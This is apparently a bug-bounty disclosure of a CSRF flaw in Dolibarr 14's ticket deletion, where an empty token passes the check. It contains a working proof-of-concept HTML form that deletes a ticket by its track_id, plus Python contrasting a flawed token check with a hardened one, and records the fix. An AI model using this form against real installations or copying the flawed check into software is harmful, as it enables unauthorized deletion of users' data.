Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In the Ticket section, you protect tickets from being deleted with CSRF attacks, but if I set the CSRF token to nothing then I am able to delete arbitrary tickets only by knowing their "track_id" parameter.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <!-- Hide the attacker page's real URL in the address bar before submission -->
  <script>history.pushState('', '', '/')</script>
  <!-- No method attribute, so the browser submits this as a GET request, as in the original PoC -->
    <form action="https://demo.dolibarr.org/ticket/card.php">
      <!-- Public tracking id of the ticket to delete -->
      <input type="hidden" name="track_id" value="2i6ypabzn92v3nt3" />
      <input type="hidden" name="action" value="confirm_delete_ticket" />
      <input type="hidden" name="confirm" value="yes" />
      <!-- Empty token: this is the value that bypasses the CSRF check -->
      <input type="hidden" name="token" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
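The server-side failure the report describes, as an added illustration that is not Dolibarr's own code: a token check that only compares the token when one is present lets the PoC's empty `token` through, while a strict check rejects it. The function names, the in-memory session, the ticket store and the forged request parameters are constructed for this example; the check shown as "vulnerable" is one plausible pattern that produces exactly the behaviour reported, not the actual Dolibarr code.

```python
import hmac
import secrets

# Constructed sample session: the token the server issued to the victim's browser.
SESSION = {"csrf_token": secrets.token_hex(16)}


def vulnerable_check(params: dict, session: dict) -> bool:
    """Hypothetical flawed check: compares the token only when one is supplied.

    Reproduces the behaviour in the report (an empty token is accepted).
    Illustration only, not Dolibarr's code.
    """
    token = params.get("token", "")
    if token and token != session["csrf_token"]:
        return False  # a wrong token is rejected...
    return True       # ...but an empty one falls through and is accepted


def hardened_check(params: dict, session: dict) -> bool:
    """Reject unless a token is present and matches the session token exactly."""
    token = params.get("token")
    expected = session.get("csrf_token")
    if not token or not expected:
        return False
    # Constant-time comparison so the token cannot be recovered via timing.
    return hmac.compare_digest(token, expected)


def delete_ticket(check, params: dict, session: dict, tickets: dict) -> bool:
    """State-changing action guarded by the supplied CSRF check.

    Returns True if the ticket identified by track_id was deleted.
    """
    if params.get("action") != "confirm_delete_ticket" or params.get("confirm") != "yes":
        return False
    if not check(params, session):
        return False
    return tickets.pop(params.get("track_id"), None) is not None


def forged_request(track_id: str) -> dict:
    """The parameters the PoC form sends: track_id, action, confirm and an empty token."""
    return {
        "track_id": track_id,
        "action": "confirm_delete_ticket",
        "confirm": "yes",
        "token": "",
    }


def demo() -> tuple:
    """Run the forged request against both checks.

    Returns (deleted_under_vulnerable_check, deleted_under_hardened_check).
    """
    track_id = "2i6ypabzn92v3nt3"  # constructed sample id, same as in the PoC
    tickets_vuln = {track_id: "ticket"}
    tickets_hard = {track_id: "ticket"}
    req = forged_request(track_id)
    deleted_vuln = delete_ticket(vulnerable_check, req, SESSION, tickets_vuln)
    deleted_hard = delete_ticket(hardened_check, req, SESSION, tickets_hard)
    return deleted_vuln, deleted_hard


if __name__ == "__main__":
    print(demo())
```

A legitimate form submission carries the session's token and passes `hardened_check`; the forged request, which cannot know that token, is rejected regardless of whether it sends an empty or a guessed value. The point is that "token absent" must be treated like "token wrong", never as "nothing to check".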

💥 Impact

This vulnerability allows an attacker to delete any ticket whose "track_id" is known. Application version: 14 (tested on the demo website).

We have contacted a member of the dolibarr team and are waiting to hear back (a year ago)
Laurent Destailleur confirmed that a fix has been merged on 6390f2 (a year ago)
Laurent Destailleur has been awarded the fix bounty